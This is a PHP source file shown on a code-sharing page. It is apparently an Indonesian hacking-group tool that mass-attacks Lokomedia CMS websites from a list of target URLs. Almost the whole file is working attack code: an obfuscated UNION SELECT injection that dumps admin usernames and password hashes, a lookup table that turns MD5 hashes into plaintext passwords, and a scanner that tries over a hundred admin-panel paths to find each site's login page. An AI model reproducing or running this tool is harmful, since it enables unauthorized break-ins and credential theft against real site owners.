Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Ranginang67
GitHub Repository: Ranginang67/DarkFly-Tool
 Path: blob/master/lib/lokmed.php
202 views
1
<?php

2
set_time_limit(0);

3
error_reporting(0);

4


5
// Lokomedia (SQL Injection) + Auto Scan Admin Login

6
// enjoyyyy

7
// Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa

8
// greetz: res7ock crew - j*ncok Sec

9
// usage: php namafile.php target.txt

10


11
//HARAP TIDAK MENGGANTI COPYRIGHT JIKA KALIAN INGIN DIHARGAI ^^

12


13
function cover() {

14
	print "[ =========================================================================== ]\n";

15
	print " --> Lokomedia (SQL Injection) + Auto Scan Admin Login <--\n";

16
	print " ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##\n";

17
	print " # greetz: res7ock crew - j*ncok Sec #\n";

18
	print "+++++++ usage: php namafile.php target.txt +++++++\n";

19
	print "[ =========================================================================== ]\n\n";

20
}

21
function ngcurl($url) {

22
    $curl = curl_init($url);

23
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

24
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);

25
    $content = curl_exec($curl);

26
    curl_close($curl);

27
    return $content;

28
}

29
function simpen($isi) {

30
	$f = fopen("md5.txt", "a+");

31
	fwrite($f, "$isi\n");

32
	fclose($f);

33
}

34


35
$admin = array(

36
'adm/',

37
'_adm_/',

38
'_admin_/',

39
'_administrator_/',

40
'operator/',

41
'sika/',

42
'develop/',

43
'ketua/',

44
'redaktur/',

45
'author',

46
'admin/',

47
'administrator/',

48
'adminweb/',

49
'user/',

50
'users/',

51
'dinkesadmin/',

52
'retel/',

53
'author/',

54
'panel/',

55
'paneladmin/',

56
'panellogin/',

57
'redaksi/',

58
'cp-admin/',

59
'master/',

60
'master/index.php',

61
'master/login.php',

62
'operator/index.php',

63
'sika/index.php',

64
'develop/index.php',

65
'ketua/index.php',

66
'redaktur/index.php',

67
'admin/index.php',

68
'administrator/index.php',

69
'adminweb/index.php',

70
'user/index.php',

71
'users/index.php',

72
'dinkesadmin/index.php',

73
'retel/index.php',

74
'author/index.php',

75
'panel/index.php',

76
'paneladmin/index.php',

77
'panellogin/index.php',

78
'redaksi/index.php',

79
'cp-admin/index.php',

80
'operator/login.php',

81
'sika/login.php',

82
'develop/login.php',

83
'ketua/login.php',

84
'redaktur/login.php',

85
'admin/login.php',

86
'administrator/login.php',

87
'adminweb/login.php',

88
'user/login.php',

89
'users/login.php',

90
'dinkesadmin/login.php',

91
'retel/login.php',

92
'author/login.php',

93
'panel/login.php',

94
'paneladmin/login.php',

95
'panellogin/login.php',

96
'redaksi/login.php',

97
'cp-admin/login.php',

98
'terasadmin/',

99
'terasadmin/index.php',

100
'terasadmin/login.php',

101
'rahasia/',

102
'rahasia/index.php',

103
'rahasia/admin.php',

104
'rahasia/login.php',

105
'dinkesadmin/',

106
'dinkesadmin/login.php',

107
'adminpmb/',

108
'adminpmb/index.php',

109
'adminpmb/login.php',

110
'system/',

111
'system/index.php',

112
'system/login.php',

113
'webadmin/',

114
'webadmin/index.php',

115
'webadmin/login.php',

116
'wpanel/',

117
'wpanel/index.php',

118
'wpanel/login.php',

119
'adminpanel/index.php',

120
'adminpanel/',

121
'adminpanel/login.php',

122
'adminkec/',

123
'adminkec/index.php',

124
'adminkec/login.php',

125
'admindesa/',

126
'admindesa/index.php',

127
'admindesa/login.php',

128
'adminkota/',

129
'adminkota/index.php',

130
'adminkota/login.php',

131
'admin123/',

132
'admin123/index.php',

133
'admin123/login.php',

134
'logout/',

135
'logout/index.php',

136
'logout/login.php',

137
'logout/admin.php',

138
'adminweb_setting',

139
);

140
$real_pass = array(

141
"a66abb5684c45962d887564f08346e8d" => "admin123456",

142
"99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",

143
"c630643500720b255abb22e2ab2c31f6" => "sumedang123",

144
"1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx", 

145
"f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",

146
"93261ae77f0df5522dd9767203f3aa17" => "house69",

147
"f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",

148
"37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",

149
"d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",

150
"fbff29af096fa646757ce8439b644714" => "vro190588",

151
"1feadc10e93f2b64c65868132f1e72d3" => "agoes",

152
"0192023a7bbd73250516f069df18b500" => "admin123",

153
"7aa1dfee8619ac8f282e296d83eb55ff" => "meong",

154
"24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",

155
"d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",

156
"5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",

157
"a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",

158
"73acd9a5972130b75066c82595a1fae3" => "ADMIN",

159
"511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",

160
"7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",

161
"99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",

162
"e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",

163
"5449ccea16d1cc73990727cd835e45b5" => "ngadimin",

164
"c21f969b5f03d33d43e04f8f136e7682" => "default",

165
"1a1dc91c907325c69271ddf0c944bc72" => "pass",

166
"fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",

167
"5f4dcc3b5aa765d61d8327deb882cf99" => "password",

168
"5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",

169
"c893bad68927b457dbed39460e6afd62" => "prueba",

170
"b2ca9cfa6067282a031d28a54886822d" => "admin4343",

171
"3a3795bb61d5377545b4f345ff223e3d" => "bingo",

172
"e172dd95f4feb21412a692e73929961e" => "bismillah",

173
"8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",

174
"0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",

175
"098f6bcd4621d373cade4e832627b4f6" => "test",	

176
"976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",

177
"5985609a2dc01098797c94a43e0a1115" => "masarief",

178
"21232f297a57a5a743894a0e4a801fc3" => "admin",

179
"1870a829d9bc69abf500eca6f00241fe" => "wordpress",

180
"126ac9f6149081eb0e97c2e939eaad52" => "blog",

181
"fe01ce2a7fbac8fafaed7c982a04e229" => "demo",

182
"04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",

183
"91f5167c34c400758115c2a6826ec2e3" => "administrador",

184
"200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",

185
"c93ccd78b2076528346216b3b2f701e6" => "admin1234",

186
"912ec803b2ce49e4a541068d495ab570" => "asdf",

187
"1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",

188
"e99a18c428cb38d5f260853678922e03" => "abc123",

189
"a152e841783914146e4bcd4f39100686" => "asdfgh",

190
"a384b6463fc216a5f8ecb6670f86456a" => "qwert",

191
"d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",

192
"b59c67bf196a4758191e42f76670ceba" => "1111",

193
"96e79218965eb72c92a549dd5a330112" => "111111",

194
"4297f44b13955235245b2497399d7a93" => "123123",

195
"c33367701511b4f6020ec61ded352059" => "654321",

196
"81dc9bdb52d04dc20036dbd8313ed055" => "1234",

197
"e10adc3949ba59abbe56e057f20f883e" => "123456",

198
"fcea920f7412b5da7be0cf42b8c93759" => "1234567",

199
"25d55ad283aa400af464c76d713c07ad" => "12345678",

200
"25f9e794323b453885f5181f1b624d0b" => "123456789",

201
"e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",

202
"befe9f8a14346e3e52c762f333395796" => "qawsed",

203
"76419c58730d9f35de7ac538c2fd6737" => "qazwsx",

204
"5f4dcc3b5aa765d61d8327deb882cf99" => "password",

205
"bed128365216c019988915ed3add75fb" => "passw0rd",

206
"21232f297a57a5a743894a0e4a801fc3" => "admin",

207
"e10adc3949ba59abbe56e057f20f883e" => "123456",

208
"5f4dcc3b5aa765d61d8327deb882cf99" => "password",

209
"25d55ad283aa400af464c76d713c07ad" => "12345678",

210
"f379eaf3c831b04de153469d1bec345e" => "666666",

211
"96e79218965eb72c92a549dd5a330112" => "111111",

212
"fcea920f7412b5da7be0cf42b8c93759" => "1234567",

213
"d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",

214
"6f3cac6213ffceee27cc85414f458caa" => "siteadmin",

215
"200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",

216
"63a9f0ea7bb98050796b649e85481845" => "root",

217
"4297f44b13955235245b2497399d7a93" => "123123",

218
"c8837b23ff8aaa8a2dde915473ce0991" => "123321",

219
"e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",

220
"4ca7c5c27c2314eecc71f67501abb724" => "letmein123",

221
"cc03e747a6afbbcbf8be7668acfebee5" => "test123",

222
"62cc2d8b4bf2d8728120d052163a77df" => "demo123",

223
"32250170a0dca92d53ec9624f336ca24" => "pass123",

224
"46f94c8de14fb36680850768ff1b7f2a" => "123qwe",

225
"200820e3227815ed1756a6b531e7e0d2" => "qwe123",

226
"c33367701511b4f6020ec61ded352059" => "654321",

227
"f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",

228
"172eee54aa664e9dd0536b063796e54e" => "adminadmin123",

229
"e924e336dcc4126334c852eb8fadd334" => "waskita1234",

230
"02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",

231
"b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",

232
"12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",

233
"f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",

234
"a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",

235
"2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",

236
"c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",

237
"6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",

238
"5136850b6c8f3ebc66122188347efda0" => "adminku",

239
"5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",

240
"acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",

241
"dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",

242
"ecb4208ee41389259a632d3a733c2786" => "741908",

243
"827ccb0eea8a706c4c34a16891f84e7b" => "12345",

244
"855be097acdf2fea4e342615a154ca3c" => "tolol",

245
"eeee80342778e7b497d507f89094b10d" => "master10",

246
"d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",

247
"9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",

248
"8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",

249
"528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",

250
"058fe7f85df1e992ef7bf948f1db7842" => "404J",

251
"abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",

252
);

253
$sites = explode("\n", file_get_contents($argv[1]));

254
if(isset($argv[1])) {

255
	cover();

256
	foreach($sites as $url) {

257
		if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {

258
			$url = "http://$url";

259
		} else {

260
			$url = $url;

261
		}

262
		$statis = "";

263
		$sisa = "";

264
		$login = "";

265
		$param_list = array("statis","kategori","berita");

266
		$curl = ngcurl($url);

267
		$curl = str_replace("'", '"', $curl);

268
		foreach($param_list as $param) {

269
			preg_match_all("/$param-(.*?)\">/", $curl, $id);

270
			foreach($id[1] as $stat) {

271
				$pecah = explode("-", $stat);

272
				$statis .= $pecah[0];

273
				$sisa .= $pecah[1];

274
				break;

275
			}

276
			foreach($admin as $adminweb) {

277
				$curl_admin = ngcurl("$url/$adminweb");

278
				if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {

279
					$login .= "$url/$adminweb";

280
					break;

281
				}

282
			}

283
			$sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");

284
			preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);

285
			preg_match("/<li>(.*)<li>/", $up[1], $akun);

286
			$data = explode(" ", $akun[1]);

287
			print "[+] URL: $url\n";

288
			//print "[+] param: $param\n";

289
			if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {

290
				if(preg_match("/indoxploit/", $sql)) {

291
					//print "[ Injection Successfully ]\n";

292
					if($data[0] == "" || $data[1] == "") {

293
						print "[+] Not Injected :(\n\n";

294
						break;

295
					} else {

296
						print "[+] username: ".$data[0]."\n";

297
						$passwd = $real_pass[$data[1]];

298
						if($passwd == "") {

299
							$passwd = $data[1];

300
							simpen($data[1]);

301
						}

302
						print "[+] password: $passwd\n";

303
					}

304
					if($login == "") {

305
						print "[+] Login Admin ga ketemu :(\n\n";

306
					} else {

307
						print "[+] Login: $login\n\n";

308
					}

309
					break;

310
				} else {

311
					print "[+] Not Injected :(\n\n";

312
					break;

313
				}

314
			} else {

315
				print "[+] Not Injected :(\n\n";

316
				break;

317
			}

318
		}

319
	}

320
} else {

321
	print "usage: php ".$argv[0]." target.txt\n";

322
}

323
?>

324